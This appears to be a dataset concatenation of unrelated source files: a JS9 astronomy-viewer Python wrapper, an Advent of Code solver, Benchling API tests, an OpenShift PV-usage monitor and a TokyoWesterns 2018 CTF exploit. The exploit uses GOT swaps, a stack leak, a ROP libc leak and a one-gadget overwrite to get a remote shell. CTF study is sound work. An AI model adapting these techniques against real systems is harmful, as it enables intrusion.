region and background region, or include and exclude. For example:
>>> JS9.ToggleRegionTags('selected', 'source', 'background');
will change a background region into a source region
or vice-versa, depending on the state of the region, while:
>>> JS9.ToggleRegionTags('selected', 'include', 'exclude');
will toggle between include and exclude.
"""
return self.send({'cmd': 'ToggleRegionTags', 'args': args})
def LoadRegions(self, *args):
"""
Load regions from a file into the current image
call:
JS9.LoadRegions(filename)
where:
- filename: input file name or URL
Load the specified regions file into the displayed image. The filename,
which must be specified, can be a local file (with absolute path or a
path relative to the displayed web page) or a URL.
"""
return self.send({'cmd': 'LoadRegions', 'args': args})
def LoadCatalog(self, *args):
"""
Load an astronomical catalog
call:
JS9.LoadCatalog(layer, table, opts)
where:
- name of shape layer into which to load the catalog
- table: string or blob containing the catalog table
- opts: catalog options
Astronomical catalogs are a special type of shape layer, in which
the shapes have been generated from a tab-delimited text file of
columns, including two columns that contain RA and Dec values. An
astronomical catalog can have a pre-amble of comments, which, by
default, have a '#' character in the first column.
The JS9.LoadCatalog() routine will read a file in this format,
processing the data rows by converting the RA and Dec values into
image position values that will be displayed as shapes in a new
catalog layer.
The first argument to the JS9.LoadCatalog() routine is the name
of the shape layer that will contain the objects in the catalog.
Specifying the name of an existing layer is valid: previous shapes
in that layer will be removed.
The second argument should be a string containing the table
data described above (the result of reading a file, performing
a URL get, etc.)
The third argument is an optional object used to specify
parameters, including:
- xcol: name of the RA column in the table
- ycol: name of the Dec column in the table
- wcssys: wcs system (FK4, FK5, ICRS, galactic, ecliptic)
- shape: shape of catalog object
- color: color of catalog shapes
- width: width of box catalog shapes
- height: height of box catalog shapes
- radius: radius of circle catalog shapes
- r1: r1 of ellipse catalog shapes
- r2: r2 of ellipse catalog shapes
- tooltip: format of tooltip string to display for each object
- skip: comment character in table file
Most of these properties have default values that are stored
in the JS9.globalOpts.catalogs object. The values listed above
also can be changed by users via the Catalog tab in the
Preferences plugin.
"""
return self.send({'cmd': 'LoadCatalog', 'args': args})
def SaveCatalog(self, *args):
"""
Save an astronomical catalog to a file
call:
JS9.SaveCatalog(filename, which)
where:
- filename: output file name
- which: layer containing catalog objects to save
Save the specified catalog layer as a text file. If filename is not
specified, the file will be saved as [layer].cat.
Don't forget that the file is saved by the browser, in whatever
location you have set up for downloads.
If the which argument is not specified, the catalog associated
with the current active layer will be saved. In either case, the
layer to save must be a catalog created from a tab-delimited
file (or URL) of catalog objects (e.g., not the regions layer).
"""
return self.send({'cmd': 'SaveCatalog', 'args': args})
def GetAnalysis(self, *args):
"""
Get server-side analysis task definitions
call:
JS9.GetAnalysis()
The JS9.GetAnalysis() routine returns an array of analysis task
definitions, each containing the following information:
- name: a short identifier string (typically one word)
- title: a longer string that will be displayed in the Analysis menu
- files: a rule that will be matched against to determine whether this
- task is available for the current image
- purl: a URL pointing to a web page containing a user parameter form
- action: the command to execute on the server side
- rtype: return type: text, plot, fits, png, regions, catalog, alert,
none
- hidden: if true, the analysis task is not shown in the Analysis menu
Not every property will be present in every task definition
(e.g., purl is only present when there is a parameter form).
Also note that hidden tasks are not returned by this call.
"""
return self.send({'cmd': 'GetAnalysis', 'args': args})
def RunAnalysis(self, *args):
"""
Run a simple server-side analysis task
call:
JS9.RunAnalysis(name, parr)
where:
- name: name of analysis tool
- parr: optional array of macro-expansion options for command line
The JS9.RunAnalysis() routine is used to execute a server-side analysis
task and return the results for further processing within Python.
NB: Prior to JS9 v1.10, this routine displayed the results on the JS9
web page instead of returning them to Python. If you want to display
the results in JS9, use the "analysis" short-cut routine instead.
The optional parr array of parameters is passed to the JS9 analysis
macro expander so that values can be added to the command line. The
array is in jQuery name/value serialized object format, which is
described here:
http://api.jquery.com/serializeArray/
"""
return self.send({'cmd': 'RunAnalysis', 'args': args})
def SavePNG(self, *args):
"""
Save image as a PNG file
call:
JS9.SavePNG(filename, opts)
where:
- filename: output file name
- opts: optional save parameters
Save the currently displayed image as a PNG file. If filename is not
specified, the file will be saved as "js9.png".
The opts object can specify the following properties:
- layers: save graphical layers (e.g. regions) (def: true)
- source: "image" or "display" (def: "display")
By default, SavePNG() will save all of the 2D graphics in the
shape layers (regions, catalogs, etc.) as well as the image. Set
the layers property to false to save only the image.
Also by default, SavePNG() will save the RGB pixels from the
display. This means, for example, that a blended set of images will
save the blended pixels. If you want to save the RGB pixels from one
of the images in a blended image, you can specify the source
property to the image. For example, in the js9blend.html demo,
you can save the RGB pixels of the Chandra image by specifying use of
the "image" source and specifying the image's id in the display
parameter:
>>> SavePNG("foo.png", {"source":"image"}, {"display":"chandra.fits"});
Don't forget that the file is saved by the browser, in whatever
location you have set up for downloads.
"""
return self.send({'cmd': 'SavePNG', 'args': args})
def SaveJPEG(self, *args):
"""
Save image as a JPEG file
call:
JS9.SaveJPEG(filename, opts)
where:
- filename: output file name
- opts: optional save parameters or a number between 0 and 1
indicating image quality
Save the currently displayed image as a JPEG file. If filename is not
specified, the file will be saved as "js9.png".
The opts object can specify the following properties:
- layers: save graphical layers (e.g. regions) (def: true)
- source: "image" or "display" (def: "display")
- quality: JPEG encoder quality
By default, SaveJPEG() will save all of the 2D graphics in the
shape layers (regions, catalogs, etc.) as well as the image. Set
the layers property to false to save only the image.
Also by default, SaveJPEG() will save the RGB pixels from the
display. This means, for example, that a blended set of images will
save the blended pixels. If you want to save the RGB pixels from one
of the images in a blended image, you can specify the source
property to the image. For example, in the js9blend.html demo,
you can save the RGB pixels of the Chandra image by specifying use of
the "image" source and specifying the image's id in the display
parameter:
>>> SaveJPEG("foo.png", {"source":"image"}, {"display":"chandra.fits"});
If encoder quality parameter is not specified, a suitable default is
used. On FireFox (at least), this default values is 0.95 (I think).
Don't forget that the file is saved by the browser, in whatever
location you have set up for downloads.
"""
return self.send({'cmd': 'SaveJPEG', 'args': args})
def GetToolbar(self, *args):
"""
Get toolbar values from the Toolbar plugin
val = GetToolbar(type)
where:
- type: type of information to retrieve
returns:
- val: array of tool objects (or an argument-dependent return)
The GetToolbar() routine returns global information about the
Toolbar plugin. If the first argument is "showTooltips", the returned
value specifies whether tooltips are currently displayed. Otherwise
an array of tool objects is returned, one for each of the defined
tools in the toolbar.
"""
return self.send({'cmd': 'GetToolbar', 'args': args})
def SetToolbar(self, *args):
"""
Set toolbar values for the Toolbar plugin
SetToolbar(arg1, arg2)
where:
- arg1: a type-dependent id or value to set
- arg2: a type-dependent value to set
The SetToolbar() routine sets global information about the Toolbar
plugin. The following values can be specified as the first argument:
- init: the text "init" triggers a re-initialization of all
display Toolbar plugins, which is useful if you have changed
the JS9.globalOpts.toolBar array to specify a new set of
top-level tools.
- showTooltips: the text "showTooltips" uses the value of the
boolean arg2 to specify whether tooltips are displayed as the mouse
hovers over a tool.
- [text]: other text is assumed to be a JSON-formatted text
containing either a new tool to add to the toolbar, or an array of
tools.
- [object]: an object is assumed to be new tool to add to the toolbar
- [array]: an array is assumed to be an array of new tools to add to
the toolbar
New tools can be added to the toolbar at any time using this routine.
The text properties associated with a tool object are:
- name: name of the tool
- tip: a tooltip to display when the mouse hovers over the tool
- image: url (relative to the install directory) containing a PNG
image file to display as the tool icon
- cmd: name of the JS9 public routine to execute when the tool is
clicked
- args: array of arguments to pass to the JS9 public routine
Only the name and cmd properties are required. If no image is
specified, a button labeled by the name value will be used.
Examples of tool objects:
>>> {
>>> "name": "linear",
>>> "tip": "linear scale",
>>> "image": "images/toolbar/dax_images/lin.png",
>>> "cmd": "SetScale",
>>> "args": ["linear"]
>>> },
>>> {
>>> "name": "histeq",
>>> "tip": "histogram equalization",
>>> "cmd": "SetScale",
>>> "args": ["histeq"]
>>> },
>>> {
>>> "name": "annulus",
>>> "tip": "annulus region",
>>> "image": "images/toolbar/dax_images/annulus.png",
>>> "cmd": "AddRegions",
>>> "args": ["annulus"]
>>> },
>>> {
>>> "name": "remove",
>>> "tip": "remove selected region",
>>> "image": "images/toolbar/dax_images/erase.png",
>>> "cmd": "RemoveRegions",
>>> "args": ["selected"]
>>> },
>>> {
>>> "name": "zoom1",
>>> "tip": "zoom 1",
>>> "image": "images/toolbar/dax_images/mag_one.png",
>>> "cmd": "SetZoom",
>>> "args": [1]
>>> },
>>> {
>>> "name": "magnifier",
>>> "tip": "toggle magnifier display",
>>> "image": "images/toolbar/dax_images/mag.png",
>>> "cmd": "DisplayPlugin",
>>> "args": ["JS9Magnifier"]
>>> }
Each time a tool is added to the list of available tools, the active
Toolbar plugins will be re-initialized to display that tool. By
default, the new tool not be added to the top-level list: you must
also edit the JS9.globalOpts.toolBar array to add the name of the
tool. If this is done after you add the tool, remember to re-initialize
active toolbars by calling:
>>> SetToolbar("init");
"""
return self.send({'cmd': 'SetToolbar', 'args': args})
def UploadFITSFile(self, *args):
"""
Upload the currently displayed FITS file to a proxy server
call:
JS9.UploadFITSFile()
Upload the currently displayed FITS file to the proxy server, so
back-end analysis can be performed. This routine requires that a
Node.js-based JS9 helper is running and that the helper has enabled
the loadProxy property and set up a workDir directory in which to
store the FITS file.
"""
return self.send({'cmd': 'UploadFITSFile', 'args': args})
def GetFITSHeader(self, *args):
"""
Get FITS header as a string
call:
JS9.GetFITSHeader(nlflag)
where:
- nlflag: true if newlines should added to each card
Return the FITS header as a string. By default, the returned string
contains the 80-character FITS cards all concatenated together. If
nlflag is true, each card will have a new-line appended.
Note that the JS9.GetImageData() routine also returns the FITS
header, but as an object whose properties contain the header
values. For example, obj.SIMPLE will usually have a value of
true, obj.BITPIX will have contain the bits/pixel, etc. This
object is more useful for programming tasks, but does not
contain the FITS comments associated with each header card.
"""
return self.send({'cmd': 'GetFITSHeader', 'args': args})
def Print(self, *args):
"""
Print the current image
"""
return self.send({'cmd': 'Print', 'args': args})
def DisplayNextImage(self, *args):
"""
Display the Next (or Previous) Image
call:
JS9.DisplayNextImage(n)
where:
- n: number of images beyond (or prior to) the one currently displayed
The JS9.DisplayNextImage() routine displays the nth image in
the display's image list beyond the currently displayed image. The
default value for n is 1. You can supply a negative number to
display an image prior to the current one in the display's image list.
"""
return self.send({'cmd': 'DisplayNextImage', 'args': args})
def CreateMosaic(self, *args):
"""
Create a Mosaic Image
call:
JS9.CreateMosaic(which, opts)
where:
- which: which images to use in the mosaic
- opts: mosaic options
The JS9.CreateMosaic() creates a mosaic image from the specified
(previously-loaded) FITS images using the mProjectPP and mAdd programs
form the Montage software suite. These Montage programs have been
compiled into JS9 using Emscripten.
Because the browser environment is memory-limited, there are some
restrictions on generating mosaics in JS9. The FITS files must be
well-behaved, i.e. they must have WCS projections which can be
approximated by tangent-plane projections (TAN, SIN, ZEA, STG, ARC).
This precludes creating mosaics from images covering large portions of
the sky. For large sky areas, please use Montage itself on your desktop
to create a mosaic. A simplified js9mosaic script is included in
the JS9 distribution or, for more control, use the Montage programs
directly. Of course, in either case, you must install Montage.
The which parameter determine which images are used in the mosaic:
- "current" or null: the current image in this display
- "all": all images in this display
- im: the image id an image from any display
- [im1, im2, ...]: an array of image ids from any display
Use "current" (or null) if you have loaded a multi-extension
FITS mosaic into JS9. Use "all" if you have loaded several
FITS files into JS9 and want to create a mosaic.
In order to keep the size of the resulting mosaic within memory
limits, JS9 reduces the size of each image before adding them all
together The options parameter determines how the reduction is
performed:
- dim: size of mosaic (def: max of JS9.globalOpts.image.[xdim,ydim])
- reduce: image size reduction technique: "js9" (def) or "shrink"
- verbose: if true, processing output is sent to the javascript console
The "dim" parameter is a target size: the larger of the resulting
mosaic dimensions will be approximately this value, depending on how
Montage processes the images. The "reduce" technique either runs
internal JS9 image sectioning code (to produce smaller internal
images, each of which are reprojected and added together) or runs the
Montage mShrinkHdr code (which reprojects the full images into smaller
files). The former seems to be faster than the latter in most
cases. The "verbose" parameter will display output on the JavaScript
console to let you know that the CreateMosaic() call is running
properly.
The resulting mosaic will be loaded into the specified JS9 display as
a separate image. Because the mosaic is separate from the original
image(s), you can view each of the latter individually (or view each
image extension of a single image using the Extensions plugin).
Internal analysis can be performed on the mosaic but,
of course, no external analysis tasks will be available.
"""
return self.send({'cmd': 'CreateMosaic', 'args': args})
def ResizeDisplay(self, *args):
"""
Change the width and height of the JS9 display
call:
JS9.ResizeDisplay(width, height)
where:
- width: new width of the display in HTML pixels
- height: new height of the display in HTML pixels
- opts: optional object containing resize parameters
You can resize the JS9 display element by supplying new width and
height parameters. The div on the web page will be resized and the
image will be re-centered in the new display. If the display size has
been increased, more of the image will be displayed as needed (up to
the new size of the display). For example, if the original display was
512x512 and you increase it to 1024x1024, a 1024x1024 image will now
be displayed in its entirety.
The opts object can contain the following properties:
- resizeMenubar: change the width of the menubar as well
The default for resizeMenubar is True, so you only need
to pass this property if you do not want to perform the resize.
"""
return self.send({'cmd': 'ResizeDisplay', 'args': args})
def GatherDisplay(self, *args):
"""
Gather other images to this JS9 Display
call:
JS9.GatherDisplay(dname, opts)
where:
- dname: name of JS9 display to which the images will be gathered
- opts: optional object
You can supply an opts object containing the following properties:
- images: array of image handles (or indexes into JS9.images array)
to gather
This routine move all or selected images in other displays to this
display.
"""
return self.send({'cmd': 'GatherDisplay', 'args': args})
def SeparateDisplay(self, *args):
"""
Separate images in this JS9 Display into new displays
call:
JS9.SeparateDisplay(dname, opts)
where:
- dname: name of JS9 display from which the images will be separated
- opts: optional object for layout properties
This routine moves each image in this display to a new display.
You can supply an opts object containing the following properties:
- images: array of image handles (or indexes into JS9.images array)
to separate
- layout: can be "horizontal", "vertical", "auto" (default: "auto")
- leftMargin: margin in pixels between horizontally separated images
- topMargin: margin in pixels between vertically separated images
The "horizontal" layout will generate a single row of images. The
"vertical" layout will generate a single column of images. The "auto"
option will layout the images in one or more rows. Each row will
contain one or more images such that at least one-half of the
right-most image is visible in the browser without the need for
horizontal scrolling.
"""
return self.send({'cmd': 'SeparateDisplay', 'args': args})
def CenterDisplay(self, *args):
"""
Scroll the JS9 display to the center of the viewport
call:
JS9.CenterDisplay()
where:
- dname: name of JS9 display to center
This routine scrolls this display to the center of the viewport.
"""
return self.send({'cmd': 'CenterDisplay', 'args': args})
def CloseDisplay(self, *args):
"""
Close all images in a display
call:
JS9.CloseDisplay(dname)
where:
- dname: name of JS9 display whose images will be closed
This routine closes all images in the specified display.
"""
return self.send({'cmd': 'CloseDisplay', 'args': args})
def RenameDisplay(self, *args):
"""
Rename the id of a JS9 display
calling sequences:
JS9.RenameDisplay(nid) # change default id (usually "JS9") to nid
JS9.RenameDisplay(oid, nid) # change oid to nid
where:
- oid: old name of JS9 display
- nid: new name of JS9 display
This routine is used by the Desktop version of JS9 to implement the
--title (and --renameid) switch(es), which change the id of the
JS9 display(s) to the specified id(s). Once an id has been renamed,
external communication (via the js9 script or pyjs9) should target
the new id instead of the original id.
The original id is still available internally, so Javascript public
API calls on the web page itself can target either the original or
the new id using the {display: "id"} syntax.
"""
return self.send({'cmd': 'RenameDisplay', 'args': args})
def RemoveDisplay(self, *args):
"""
Close all images in a display and remove the display
call:
JS9.RemoveDisplay(dname)
where:
- dname: name of JS9 display to remove
This routine will close all images in the specified display and then
remove the display. It is available for displays contained in
light windows and for displays contained in JS9 Grid Containers. When
removing the display inside a light window, the light window is
immediately closed without a confirmation dialog box (unlike a light
window being closed via its close button.) For a display inside
a JS9 Grid Container, the display is removed from the DOM, so that it
no longer is part of the grid layout. Note, however, that you cannot
remove all displays from a grid container: at least one display must be
left in the container.
"""
return self.send({'cmd': 'RemoveDisplay', 'args': args})
def DisplayHelp(self, *args):
"""
Display help in a light window
call:
JS9.DisplayHelp(name)
where:
- name: name of a help file or url of a web site to display
The help file names are the property names in JS9.helpOpts (e.g.,
'user' for the user page, 'install' for the install page, etc.).
Alternatively, you can specify an arbitrary URL to display (just
because).
"""
return self.send({'cmd': 'DisplayHelp', 'args': args})
def LightWindow(self, *args):
"""
Display content in a light window
call:
JS9.LightWindow(id, type, content, title, opts)
where:
- id: unique id for light window div(default: "lightWindow" + uniqueID)
- type: content type: "inline", "div", "ajax", "iframe" (def: "inline")
- content: content of the light window (default: none)
- title: title (default: "JS9 light window")
- opts: configuration string
(default: "width=830px,height=400px,center=1,resize=1,scrolling=1")
Display arbitrary content inside a light window. There are any number
of light window routines available on the Net. JS9 uses light window
routines developed by Dynamic Drive (http://www.dynamicdrive.com).
Extensive documentation can be found on the Dynamic Drive web
site: http://www.dynamicdrive.com/dynamicindex8/dhtmlwindow.
The content shown inside the window depends on the content parameter:
- iframe: the URL of the page to display (ie: "http://www.google.com")
- inline: the HTML to display (back-slashing any special JavaScript
characters, such as apostrophes)
- ajax: the relative path to the external page to display, relative to
the current page (ie: "../external.htm")
- div: define a DIV element on the page with a unique ID attribute
(probably hidden using style="display:none") and the use the DIV's id
as the content value
JS9 typically uses the inline option. Note that web sites often
do not allow themselves to be embedded in an iframe, so this is an
unreliable option.
The opts parameter specifies options for the light window, such
as its size. This parameter consists of a string with comma-separated
keywords, e.g.:
>>> "width=830px,height=400px,center=1,resize=1,scrolling=1"
The opts keywords, defined in the Dynamic Drive documentation, are:
width, height, left, top, center, resize, and scrolling. The
JS9.lightOpts.dhtml object defines oft-used lightwin configurations,
and the JS9.lightOpts.dhtml.textWin property is used as the
default for this call. You can utilize these properties in your own
call to LightWindow() or make up your own configuration string.
As an extension to the Dynamic Drive light window support, JS9 adds
the ability to double-click the title bar in order to close the window.
"""
return self.send({'cmd': 'LightWindow', 'args': args})
def analysis(self, *args):
"""
run/list analysis for current image
This is a commmand-style routine, easier to type than the full routine
at the expense of some flexibility:
- with no arguments, the getter is called to retrieve current values.
- with arguments, the setter is called to set current values.
Returned results are of type string.
"""
return self.send({'cmd': 'analysis', 'args': args})
def colormap(self, *args):
"""
set/get colormap for current image
This is a commmand-style routine, easier to type than the full routine
at the expense of some flexibility:
- with no arguments, the getter is called to retrieve current values.
- with arguments, the setter is called to set current values.
Returned results are of type string: 'colormap contrast bias'
"""
return self.send({'cmd': 'colormap', 'args': args})
def cmap(self, *args):
"""
set/get colormap for current image (alias)
This is a commmand-style routine, easier to type than the full routine
at the expense of some flexibility:
- with no arguments, the getter is called to retrieve current values.
- with arguments, the setter is called to set current values.
Returned results are of type string: 'colormap contrast bias'
"""
return self.send({'cmd': 'cmap', 'args': args})
def colormaps(self, *args):
"""
get list of available colormaps
No setter routine is provided.
Returned results are of type string: 'grey, red, ...'
"""
return self.send({'cmd': 'colormaps', 'args': args})
def helper(self, *args):
"""
get helper info
"""
return self.send({'cmd': 'helper', 'args': args})
def image(self, *args):
"""
get name of currently loaded image or display specified image
This is a commmand-style routine, easier to type than the full routine
at the expense of some flexibility:
- with no arguments, the getter is called to retrieve current values.
- with arguments, the setter is called to set current values.
Returned results are of type string.
"""
return self.send({'cmd': 'image', 'args': args})
def images(self, *args):
"""
get list of currently loaded images
No setter routine is provided.
Returned results are of type string.
"""
return self.send({'cmd': 'images', 'args': args})
def load(self, *args):
"""
load image(s)
No getter routine is provided.
"""
return self.send({'cmd': 'load', 'args': args})
def pan(self, *args):
"""
set/get pan location for current image
This is a commmand-style routine, easier to type than the full routine
at the expense of some flexibility:
- with no arguments, the getter is called to retrieve current values.
- with arguments, the setter is called to set current values.
Returned results are of type string: 'x y'
"""
return self.send({'cmd': 'pan', 'args': args})
def regcnts(self, *args):
"""
get background-subtracted counts in regions
This is a commmand-style routine, easier to type than the full routine:
- with no arguments, acts as if the Analysis menu option was chosen
- with arguments, acts like the full routine
With arguments, returned results are of type string.
"""
return self.send({'cmd': 'regcnts', 'args': args})
def region(self, *args):
"""
add region to current image or list all regions (alias)
This is a commmand-style routine, easier to type than the full routine
at the expense of some flexibility:
- with no arguments, the getter is called to retrieve current values.
- with arguments, the setter is called to set current values.
Returned results are of type string.
"""
return self.send({'cmd': 'region', 'args': args})
def regions(self, *args):
"""
add region to current image or list all regions
This is a commmand-style routine, easier to type than the full routine
at the expense of some flexibility:
- with no arguments, the getter is called to retrieve current values.
- with arguments, the setter is called to set current values.
Returned results are of type string.
"""
return self.send({'cmd': 'regions', 'args': args})
def resize(self, *args):
"""
set/get size of the JS9 display
This is a commmand-style routine, easier to type than the full routine
at the expense of some flexibility:
- with no arguments, the getter is called to retrieve current values.
- with arguments, the setter is called to set current values.
Returned results are of type string: 'width height'
"""
return self.send({'cmd': 'resize', 'args': args})
def scale(self, *args):
"""
set/get scaling for current image
This is a commmand-style routine, easier to type than the full routine
at the expense of some flexibility:
- with no arguments, the getter is called to retrieve current values.
- with arguments, the setter is called to set current values.
Returned results are of type string: 'scale scalemin scalemax'
"""
return self.send({'cmd': 'scale', 'args': args})
def scales(self, *args):
"""
get list of available scales
No setter routine is provided.
Returned results are of type string: 'linear, log, ...'
"""
return self.send({'cmd': 'scales', 'args': args})
def wcssys(self, *args):
"""
set/get wcs system for current image
This is a commmand-style routine, easier to type than the full routine
at the expense of some flexibility:
- with no arguments, the getter is called to retrieve current values.
- with arguments, the setter is called to set current values.
Returned results are of type string.
"""
return self.send({'cmd': 'wcssys', 'args': args})
def wcsu(self, *args):
"""
set/get wcs units used for current image
This is a commmand-style routine, easier to type than the full routine
at the expense of some flexibility:
- with no arguments, the getter is called to retrieve current values.
- with arguments, the setter is called to set current values.
Returned results are of type string.
"""
return self.send({'cmd': 'wcsu', 'args': args})
def wcssystems(self, *args):
"""
get list of available wcs systems
No setter routine is provided.
Returned results are of type string: 'FK4, FK5, ...'
"""
return self.send({'cmd': 'wcssystems', 'args': args})
def wcsunits(self, *args):
"""
get list of available wcs units
No setter routine is provided.
Returned results are of type string: 'degrees, ...'
"""
return self.send({'cmd': 'wcsunits', 'args': args})
def zoom(self, *args):
"""
set/get zoom for current image
This is a commmand-style routine, easier to type than the full routine
at the expense of some flexibility:
- with no arguments, the getter is called to retrieve current values.
- with arguments, the setter is called to set current values.
Returned results are type integer or float.
"""
return self.send({'cmd': 'zoom', 'args': args})
| 2.34375 | 2 |
F_Machine_learning/2_Supervised-Learning/solutions/ex0_4a.py | oercompbiomed/CBM101 | 7 | 12765011 | def pcnt(N, p):
return int(p * N) | 1.789063 | 2 |
2019/day-14/part12.py | amochtar/adventofcode | 1 | 12765012 | #!/usr/bin/env python
from collections import defaultdict
from math import ceil
def solve(input):
def element(s):
n, el = s.split()
return (el, int(n))
def nxt(needs):
for el, n in needs.items():
if el != 'ORE' and n > 0:
return (el, n)
def ore_needed(f):
needs = defaultdict(int)
needs['FUEL'] = f
while next_el := nxt(needs):
el, need = next_el
produces, ins = reactions[el]
factor = ceil(need/produces)
needs[el] -= factor*produces
for (in_el, in_need) in ins:
requires = factor*in_need
needs[in_el] += requires
return needs['ORE']
reactions = {}
for line in input:
ins, out = line.split(' => ')
el, produces = element(out)
reactions[el] = (produces, [element(i) for i in ins.split(', ')])
ore_1fuel = ore_needed(1)
print(ore_1fuel)
max_ore = 1000000000000
low = max_ore // ore_1fuel
high = low * 2
max_fuel = 0
while low < high:
fuel = (low+high+1)//2
ore = ore_needed(fuel)
if ore <= max_ore:
max_fuel = max(fuel, max_fuel)
low = fuel
else:
high = fuel-1
print(max_fuel)
# with open('test.txt', 'r') as f:
# input = f.read().splitlines()
# solve(input)
with open('input.txt', 'r') as f:
input = f.read().splitlines()
solve(input)
| 3.28125 | 3 |
tests/test_models/test_dna_sequence.py | klavinslab/benchling-api | 36 | 12765013 | import pytest
def test_web_link(session):
dnas = session.DNASequence.last(10)
for dna in dnas:
loaded = session.DNASequence.from_share_link(dna.web_url)
assert loaded.id == dna.id
# def test_share_link(session):
#
# # dna = session.DNASequence.from_share_link('https://benchling.com/s/seq-YR1KBSvPlZ8sGOlnOBqe')
# # assert dna
# dna = session.DNASequence.one()
# print(session.DNASequence.find(dna.id))
# print(session.DNASequence.find('seq_Kzxlbux9'))
#
# # print(session.Folder.find('lib_SjLcTsG4'))
#
# folder = session.Folder.find_by_name('APITrash')
# print(folder)
# print(folder.id)
# print(session.Folder.find(folder.id))
| 2.21875 | 2 |
ctf/TokyoWesterns18/swap/exploit.py | lordidiot/lordidiot.github.io | 1 | 12765014 | #!/usr/bin/python
from pwn import *
import sys
#sys.path.append('/home/lord_idiot/CTF-Tools/python-libs')
HOST = "swap.chal.ctf.westerns.tokyo"
PORT = 37567
prev = None
stack_leak = None
stopRecv = False
def sett(a, b):
global stopRecv
if stopRecv:
r.sendline("1")
r.sendline(str(a))
r.sendline(str(b))
return
else:
r.sendlineafter("Your choice: \n", "1")
r.sendlineafter("1st address: \n", str(a))
r.sendlineafter("2nd address: \n", str(b))
return
def swap():
global stopRecv
if stopRecv:
r.sendline("2")
else:
r.sendlineafter("Your choice: \n", "2")
return
def lowestByte(dest, byte, secondRound=False):
global prev
global stack_leak
if secondRound:
addr2 = stack_leak+0x4a
else:
addr2 = stack_leak+0x32
gadget = stack_leak+0x142
sett(prev, 0x601200+byte)
swap()
sett(addr2, 0x601200+byte)
swap()
sett(gadget, dest)
swap()
prev = 0x601200+byte
return
def write(addr, value, secondRound=False):
global prev
print "Writing 0x{:x} to 0x{:x}".format(value, addr)
for i in xrange(8):
val = value >> 8*(7-i) & 0xff
lowestByte(0x601310, val, secondRound)
sett(0x601310-7, 0x601400-i)
swap()
sett(addr, 0x601400)
swap()
def exploit(r):
global prev
global stack_leak
global stopRecv
GOT_exit = 0x601018
GOT_puts = 0x601028
GOT_stkfail = 0x601030
GOT_printf = 0x601038
GOT_setvbuff = 0x601048
GOT_atoi = 0x601050
# allow printf to be called once
r.sendlineafter("Your choice: \n", "0")
# leak with swap atoi printf
sett(GOT_printf, GOT_atoi)
swap()
r.sendafter("Your choice: \n", "%p")
stack_leak = int(r.recvn(14), 16)
addr1 = stack_leak+0x2a
addr2 = stack_leak+0x32
log.info("stack_leak : 0x{:x}".format(stack_leak))
# swap back
r.sendafter("Your choice: \n", "aa")
# NEED THIS BECAUSE TOO SLOW IN REMOTE
stopRecv = True
# arbitrary write ROP chain
prev = stack_leak+0xd2
write(GOT_exit, 0x400a46)
PLT_read = 0x4006d0
rdi = 0x0000000000400a53
rsip = 0x0000000000400a51
ROP = []
#leak
ROP.append(rdi)
ROP.append(GOT_printf)
ROP.append(0x4006a0) #PLT_puts
ROP.append(0x0000000004008E9) #main
rop_start = stack_leak+0x4a
for gadget in ROP:
write(rop_start, gadget)
rop_start += 8
r.sendline("3")
r.recvuntil("Bye. ")
LIBC_printf = u64(r.recvline().strip("\n").ljust(8, "\x00"))
LIBC_base = LIBC_printf - 0x56510
log.info("LIBC_base : 0x{:x}".format(LIBC_base))
####### SECOND ROUND #############
write(GOT_exit, LIBC_base+0xf24cb, True)
write(stack_leak+0x8a, 0, True)
r.sendline("3")
r.interactive()
return
if __name__ == "__main__":
elf_name = "./swap_returns"
e = ELF(elf_name)
libc_name = "./libc.so.6"
#libc = ELF(libc_name)
if sys.argv[-1] == "remote":
r = remote(HOST, PORT)
exploit(r)
else:
if libc_name != "":
r = process(elf_name, env={"LD_PRELOAD" : libc_name})
else:
r = process(elf_name)
print util.proc.pidof(r)
if sys.argv[-1] == "debug":
pause()
exploit(r) | 2.53125 | 3 |
scripts/monitoring/cron-send-usage-pv.py | north-team/openshift-tools | 0 | 12765015 | <reponame>north-team/openshift-tools
#!/usr/bin/env python
""" Report the usage of the pv """
# We just want to see any exception that happens
# don't want the script to die under any cicumstances
# script must try to clean itself up
# pylint: disable=broad-except
# main() function has a lot of setup and error handling
# pylint: disable=too-many-statements
# main() function raises a captured exception if there is one
# pylint: disable=raising-bad-type
# Adding the ignore because it does not like the naming of the script
# to be different than the class name
# pylint: disable=invalid-name
import argparse
import datetime
import logging
import time
import re
# Our jenkins server does not include these rpms.
# In the future we might move this to a container where these
# libs might exist
#pylint: disable=import-error
#pylint: disable=maybe-no-member
from openshift_tools.monitoring.ocutil import OCUtil
from openshift_tools.monitoring.metric_sender import MetricSender
logging.basicConfig(
format='%(asctime)s - %(relativeCreated)6d - %(levelname)-8s - %(message)s',
)
logger = logging.getLogger()
logger.setLevel(logging.INFO)
ocutil = OCUtil()
def runOCcmd(cmd, base_cmd='oc'):
""" log commands through ocutil """
logger.info(base_cmd + " " + cmd)
return ocutil.run_user_cmd(cmd, base_cmd=base_cmd, )
def runOCcmd_yaml(cmd, base_cmd='oc'):
""" log commands through ocutil """
logger.info(base_cmd + " " + cmd)
return ocutil.run_user_cmd_yaml(cmd, base_cmd=base_cmd, )
def parse_args():
""" parse the args from the cli """
logger.debug("parse_args()")
parser = argparse.ArgumentParser(description='OpenShift pv usage ')
parser.add_argument('-v', '--verbose', action='store_true', default=None, help='Verbose?')
return parser.parse_args()
def send_metrics(usage, capacity, used):
""" send data to MetricSender"""
logger.debug("send_metrics()")
ms_time = time.time()
ms = MetricSender()
logger.info("Send data to MetricSender")
ms.add_metric({'openshift.master.pv.percent.usage': usage})
ms.add_metric({'openshift.master.pv.capacity.max': capacity})
ms.add_metric({'openshift.master.pv.capacity.used': used})
ms.send_metrics()
logger.info("Data sent to Zagg in %s seconds", str(time.time() - ms_time))
def get_dynamic_pod_name():
"""get the max_capacity of the cluster"""
pods = ocutil.get_pods()
dynamic_pod_name = ""
pattern = re.compile(r'online-volume-provisioner-')
for pod in pods['items']:
pod_name = pod['metadata']['name']
match = pattern.search(pod_name)
#find the dynamic pod name
if match:
dynamic_pod_name = pod_name
return dynamic_pod_name
def get_max_capacity(pod_name):
"""get the env from the dynamic pod """
env_info = runOCcmd_yaml(" env pod/"+pod_name)
envs = env_info['spec']['containers']
max_capacity = 0
for en in envs[0]['env']:
if en['name'] == 'MAXIMUM_CLUSTER_CAPACITY':
max_capacity = en['value']
return max_capacity
def get_pv_usage():
"""get all the pv used """
pv_info = runOCcmd_yaml(" get pv")
total = 0
for pv in pv_info['items']:
namespace = pv['spec']['claimRef']['namespace']
capacity = pv['spec']['capacity']['storage']
if namespace != "openshift-infra" and namespace != "logging":
capacity_int = int(capacity.strip('GIgi'))
total = total + capacity_int
return total
